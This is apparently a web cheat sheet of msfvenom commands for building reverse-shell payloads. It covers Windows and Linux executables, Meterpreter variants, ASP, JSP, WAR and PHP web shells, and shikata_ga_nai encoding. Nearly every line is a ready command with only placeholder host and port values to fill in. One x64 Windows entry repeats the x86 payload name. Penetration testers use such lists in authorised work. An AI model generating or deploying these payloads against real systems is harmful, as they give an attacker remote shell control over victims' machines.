Table of Contents

Sharing is caring

Non-Meterpreter

We can execute the msfvenom –list-payloads command to see a brief description about all of the payloads msfvenom can offer, if we want to know specific information about the payload, executing a msfvenom -p payload –list-options will list all of the options avalible in the payload.

Binaries

Staged Payloads for Windows

x86	msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload-x86.exe
x64	msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload-x64.exe

Stageless Payloads for Windows

x86	msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload-x86.exe
x64	msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload-x64.exe

Staged Payloads for Linux

x86	msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > payload-x86.elf
x64	msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > payload-x64.elf

Stageless Payloads for Linux

x86	msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > payload-x86.elf
x64	msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > payload-x64.elf

Web Payloads

asp	msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > webshell.asp
jsp	msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > webshell.jsp
war	msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > webshell.war
php	msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > webshell.php

Meterpreter

Binaries

Staged Payloads for Windows

x86	msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload-x86.exe
x64	msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload-x64.exe

Stageless payloads for Windows

x86	msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload-x86.exe
x64	msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > payload-x64.exe

Staged Payloads for Linux

x86	msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > payload-x86.elf
x64	msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > payload-x64.elf

Stageless Payloads for Linux

x86	msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > payload-x86.elf
x64	msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > payload-x64.elf

Web Payloads

asp	msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > webshell.asp
jsp	msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > webshell.jsp
war	msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > webshell.war
php	msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > webshell.php

Encoders

Generating payload without encoding

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl

Generating payload with encoding

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai

MSFVenom Cheatsheet for Reverse_Shell Payloads

Non-Meterpreter

Binaries

Staged Payloads for Windows

Stageless Payloads for Windows

Staged Payloads for Linux

Stageless Payloads for Linux

Meterpreter

Binaries

Staged Payloads for Windows

Stageless payloads for Windows

Staged Payloads for Linux

Stageless Payloads for Linux

Web Payloads

Encoders

Generating payload without encoding

Generating payload with encoding

Related